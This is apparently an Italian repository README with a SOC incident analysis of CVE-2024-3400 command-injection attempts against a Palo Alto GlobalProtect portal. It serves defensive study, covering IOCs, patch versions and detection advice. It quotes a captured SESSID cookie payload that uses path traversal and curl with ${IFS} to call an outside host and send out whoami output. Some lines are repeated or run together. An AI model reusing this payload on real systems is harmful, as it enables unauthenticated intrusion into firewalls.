
Strategie di rilevamento, analisi e risposta per tentativi di sfruttamento di CVE-2024-3400 che prendono di mira i portali GlobalProtect di Palo Alto PAN-OS. Include IOCs, pattern di exploit e indicazioni per la mitigazione.
Strategie di rilevamento, analisi e risposta per tentativi di sfruttamento di CVE-2024-3400 che prendono di mira i portali GlobalProtect di Palo Alto PAN-OS. Include IOC, modelli di exploit e linee guida per la mitigazione.
Questo repository contiene un'indagine dettagliata e un'analisi delle minacce di CVE-2024-3400, una vulnerabilità critica di injection di comandi non autenticata che interessa il software Palo Alto Networks PAN-OS, in particolare il portale GlobalProtect.
Il 18 aprile 2024 è stata rilevata attività di sfruttamento contro un firewall PAN-OS interno utilizzando l'endpoint vulnerabile /global-protect/login.esp. L'attaccante ha utilizzato un cookie SESSID appositamente modificato contenente un comando curl eseguito con backtick per raggiungere un server C2 remoto ospitato su 144.172.79.92 (Miami, Florida). Il payload di sfruttamento ha sfruttato ${IFS} per eludere semplici filtri e ha utilizzato la directory di telemetria di PAN-OS per mettere in scena attività dannose. Il firewall ha risposto con un 200 OK, indicando che il payload è stato probabilmente eseguito con successo.

ID Evento: 249
Regola di rilevamento: SOC274 – Sfruttamento di injection di comandi PAN-OS
Ora evento: 18 aprile 2024, 03:09 UTC
Hostname: PA-Firewall-01
IP di destinazione: 172.16.17.139
IP di origine: 144.172.79.92
Metodo richiesta: POST
Endpoint: /global-protect/login.esp
Cookie Payload: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
Hash dannosi:
SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5: 0c1554888ce9ed0da1583dbdf7b31651
Script dannoso: (eseguito usando )





SESSID per injection di comandi${IFS} per elusione/opt/panlogs/tmp/device_telemetrydt_send post-sfruttamento4444


10.2.9-h1, 11.0.4-h1 o 11.1.2-h3144.172.79.92logs/: Log di rilevamento analizzati e grezziioc/: Hash di file e IP associati all'attaccoanalysis/: Approfondimento sul comportamento dell'exploit e tracciamento dei processireport/: Riepilogo e immagini dei log e dei codici delle mie indaginiCVE-2024-3400 si riferisce a una vulnerabilità critica in Palo Alto Networks PAN-OS, che colpisce specificamente i gateway GlobalProtect. Ecco una sintesi di ciò che è pubblicamente noto al riguardo:
Punteggio CVSS: 10.0 (Critico)
Pubblicato: Aprile 2024
Prodotti interessati: PAN-OS 10.2, 11.0 e 11.1 con GlobalProtect abilitato.
Sfruttamento: Confermato in natura (zero-day)
Tipo di vulnerabilità: Injection di comandi non autenticata
CVE-2024-3400 consente ad attaccanti non autenticati di eseguire comandi arbitrari sul sistema operativo del firewall. Ciò di fatto dà il pieno controllo sui dispositivi interessati senza bisogno di credenziali — un grave punto di violazione per qualsiasi azienda che si affida ai firewall Palo Alto.
Il gateway GlobalProtect deve essere abilitato.
Versioni specifiche di PAN-OS (10.2.x, 11.0.x, 11.1.x).
Sfruttabile via internet se non protetto da ulteriori livelli di sicurezza.
Invio di richieste appositamente create per sfruttare il difetto di injection.
Distribuzione di shell remote o download di payload di secondo stadio.
Il comportamento osservato include:
Esecuzione di comandi tramite URL appositamente creati
Meccanismi di persistenza
Movimento laterale all'interno delle reti
Applicare la patch immediatamente: Palo Alto ha rilasciato correzioni; aggiornare a versioni non vulnerabili (ad esempio 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 o successive).
Verificare la presenza di indicatori di compromissione (IOC) come processi sospetti, connessioni in uscita o cronologia CLI insolita.
Utilizzare strumenti come Shodan o inventari delle risorse per trovare appliance vulnerabili.
Cercare IP esterni che accedono a GlobalProtect senza autenticazione valida.
Verificare l'esecuzione di comandi sospetti nei log (show system processes, cat /etc/passwd, ecc.).
Monitorare il comportamento del firewall e attivare avvisi per connessioni in uscita anomale.
Questo repository funge sia da rapporto di indagine interno che da risorsa educativa per i difensori che cercano di comprendere lo sfruttamento nel mondo reale delle vulnerabilità PAN-OS. Contributi e osservazioni aggiuntive sono benvenuti.
update.py/usr/bin/python3